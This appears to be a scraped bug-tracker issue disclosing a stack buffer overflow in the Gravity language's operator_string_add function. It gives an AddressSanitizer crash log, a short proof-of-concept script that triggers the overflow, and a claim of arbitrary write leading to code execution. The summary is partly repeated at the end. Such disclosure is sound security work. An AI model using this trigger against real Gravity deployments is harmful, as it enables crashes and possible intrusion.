Gravity is vulnerable to a Stack-Buffer-Overflow in the operator_string_add function. ASAN is saying it is a "buffer-underflow" but by looking at gravity under GDB we can see that we are gaining a arbitrary write. This opens up a security risk as a attacker can use this to write passed a static buffer and achieve code execution.
Execution:
./gravity test.gravity
GDB:
ASAN:
==86043==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fff5b513380 at pc 0x00010478f89e bp 0x7fff5b5121d0 sp 0x7fff5b511978
WRITE of size 2147483647 at 0x7fff5b513380 thread T0
#0 0x10478f89d in wrap_memcpy (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4e89d)
#1 0x10470d06e in operator_string_add (gravity:x86_64+0x10002106e)
#2 0x1047139e5 in gravity_vm_exec (gravity:x86_64+0x1000279e5)
#3 0x104717c68 in gravity_vm_runmain (gravity:x86_64+0x10002bc68)
#4 0x104726499 in main (gravity:x86_64+0x10003a499)
#5 0x7fff9a67f234 in start (libdyld.dylib:x86_64+0x5234)
Address 0x7fff5b513380 is located in stack of thread T0 at offset 0 in frame
#0 0x104725f2f in main (gravity:x86_64+0x100039f2f)
This frame has 3 object(s):
[32, 176) 'delegate' <== Memory access at offset 0 partially underflows this variable
[240, 248) 'size' <== Memory access at offset 0 partially underflows this variable
[272, 784) 'buffer41' <== Memory access at offset 0 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-underflow (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4e89d) in wrap_memcpy
Shadow bytes around the buggy address:
0x1fffeb6a2620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1fffeb6a2670:[f1]f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2680: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 f2
0x1fffeb6a2690: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==86043==ABORTING
Abort trap: 6
POC:
func main () {
var s = "AAAAAAAAAAAAA";
s = s+1000000
var ret = ""
for (var c in s)
{
if (c == "A")
{
while(true)
{
ret += ret+c;
}
}
}
return ret;
}
The text was updated successfully, but these errors were encountered:
Summary:
Gravity is vulnerable to a Stack-Buffer-Overflow in the operator_string_add function. ASAN is saying it is a "buffer-underflow" but by looking at gravity under GDB we can see that we are gaining a arbitrary write. This opens up a security risk as a attacker can use this to write passed a static buffer and achieve code execution.
Execution:
./gravity test.gravity
GDB:
ASAN:
POC:
The text was updated successfully, but these errors were encountered: